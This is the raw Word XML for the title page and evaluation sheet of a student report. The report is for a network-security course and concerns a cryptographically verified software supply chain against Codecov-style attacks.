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CBCC" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="005E06C9" w:rsidP="00F416E0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F416E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>BMS INSTITUTE OF TECHNOLOGY AND MANAGEMENT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183715AC" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="005E06C9" w:rsidP="00F416E0">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F416E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Autonomous Institute under VTU, Belagavi, Karnataka - 590 018</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144722AE" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="005E06C9" w:rsidP="00F416E0">
      <w:pPr>
        <w:spacing w:after="0" w:line="276"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 xml:space="preserve">Yelahanka, Bengaluru, Karnataka - 560 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F416E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>119</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080A33B9" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="005E06C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F416E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="69EA5221" wp14:editId="5D5DA363">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>33655</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1369060" cy="1415415"/>
            <wp:effectExtent l="0" t="0" r="254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69060" cy="1415415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6EF0C4" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="006E7149">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D17374A" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="006E7149">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EB0F28A" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="006E7149">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45557E1C" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="006E7149">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BD3DA2D" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="006E7149">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0965E0AB"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lang w:val="en-US"/>
        </w:rPr>
        <w:t>Information and Network Security (BCS701)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F416E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> CCA Report </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2468BE6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On</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615CB3A1" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="005E06C9" w:rsidP="00F416E0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F416E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“Cryptographically Verified Software Supply Chain for Preventing Codecov-Style Supply-Chain Attacks”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C641542" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="006E7149" w:rsidP="00F416E0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C2AA2B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BACHELOR OF ENGINEERING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB2382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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4221F86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INFORMATION SCIENCE AND ENGINEERING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4464E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by</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="73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3692"/>
      </w:tblGrid>
      <w:tr w:rsidR="006E7149" w:rsidRPr="00F416E0" w14:paraId="3CC9407A" w14:textId="77777777" w:rsidTr="00F416E0">
        <w:trPr>
          <w:trHeight w:val="540"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3692" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56DF1289"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NAME</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3692" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="46D6E2D8"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USN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F416E0" w:rsidRPr="00F416E0" w14:paraId="04C23189" w14:textId="77777777" w:rsidTr="00F416E0">
        <w:trPr>
          <w:trHeight w:val="540"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3692" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31CA1842"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31116E53"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53BB4A36" w14:textId="77777777" w:rsidTr="00F416E0">
        <w:trPr>
          <w:trHeight w:val="540"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3692" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59C8746D"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7A2760D8"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3CC86133" w14:textId="77777777" w:rsidTr="00F416E0">
        <w:trPr>
          <w:trHeight w:val="540"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3692" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="63BE7E13"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1DF78C26" w14:textId="77777777" w:rsidR="00F416E0" w:rsidRPr="00F416E0" w:rsidRDefault="00F416E0" w:rsidP="00F416E0">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0FBB5127" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="006E7149" w:rsidP="00F416E0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19AB14FB" w14:textId="77777777" w:rsidR="00F416E0" w:rsidRDefault="00F416E0" w:rsidP="00F416E0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4893FEE2" w14:textId="165A1A2E"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Under the Guidance of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A6105F" w14:textId="2F11B660" w:rsidR="006E7149" w:rsidRPr="006B1CDA" w:rsidRDefault="006B1CDA" w:rsidP="00F416E0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B1CDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Prof. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1CDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sonnegowda</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B1CDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> K</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCEF869" w14:textId="52050FB8" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="005A47F1"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 xml:space="preserve">Assistant </w:t>
      </w:r>
      <w:r w:rsidR="005E06C9" w:rsidRPr="00F416E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Professor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC78B2F" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="006E7149" w:rsidP="00F416E0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E338C61" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="006E7149" w:rsidP="00F416E0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55108CD1" w14:textId="77777777" w:rsidR="00F416E0" w:rsidRDefault="00F416E0" w:rsidP="00F416E0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E8A1504" w14:textId="77777777" w:rsidR="00F416E0" w:rsidRDefault="00F416E0" w:rsidP="00F416E0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C6CFD1E" w14:textId="77777777" w:rsidR="00F416E0" w:rsidRDefault="00F416E0" w:rsidP="00F416E0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A9D13EB" w14:textId="2C376208" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="005E06C9" w:rsidP="00F416E0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F416E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DEPARTMENT OF INFORMATION SCIENCE AND ENGINEERING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2711FE6E"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Avalahalli, Yelahanka, Bengaluru, Karnataka -560</w:t>
      </w:r>
      <w:r w:rsidRPr="00F416E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>119</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785A968D"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lang w:val="en-US"/>
        </w:rPr>
        <w:t>2025-26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464EA232" w14:textId="536C0777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43" w:rsidP="00E71C43">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F416E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Evaluation </w:t>
      </w:r>
      <w:r w:rsidR="00F416E0" w:rsidRPr="00F416E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Sheet</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9886" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2131"/>
        <w:gridCol w:w="2268"/>
        <w:gridCol w:w="964"/>
        <w:gridCol w:w="964"/>
        <w:gridCol w:w="964"/>
        <w:gridCol w:w="964"/>
        <w:gridCol w:w="964"/>
        <w:gridCol w:w="667"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E71C43" w:rsidRPr="00F416E0" w14:paraId="425C95C3" w14:textId="77777777" w:rsidTr="00F416E0">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="1983"/>
          <w:jc w:val="center"/>
        </w:trPr>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1F22183C" w14:textId="67F2777D"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sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="00F416E0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A087256" w14:textId="77777777"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USN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="964" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:textDirection w:val="btLr"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31174474" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43" w:rsidP="00E71C43">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="-109" w:right="-108"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F416E0">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Problem Understanding &amp; Requirements </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="964" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:textDirection w:val="btLr"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64A9EFAE" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43" w:rsidP="00E71C43">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="-110" w:right="-10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Design &amp;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="665CC25F" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43" w:rsidP="00E71C43">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="-110" w:right="-10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Implementation </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="964" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:textDirection w:val="btLr"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F99A064" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43" w:rsidP="00E71C43">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="-110" w:right="-11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 xml:space="preserve">Security Analysis </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13AAC2B2" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43" w:rsidP="00E71C43">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="-110" w:right="-11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Testing </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="964" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:textDirection w:val="btLr"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18FBDA24"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Innovation &amp;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10EC68C1"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Application Relevance</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="587B6723"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textDirection w:val="btLr"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11309E4E"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Documentation &amp;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1135E217"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Presentation </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="667" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B2F5855" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43" w:rsidP="00E71C43">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="-112" w:right="-103"/>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Total</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E71C43" w:rsidRPr="00F416E0" w14:paraId="5A7DE1DC" w14:textId="77777777" w:rsidTr="00F416E0">
        <w:trPr>
          <w:trHeight w:val="478"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2131" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74EA2E5B" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57015510" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69293854"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="964" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D62CF78"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9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="964" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02BE307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5555570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45F7E08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4</w:t>
            </w:r>
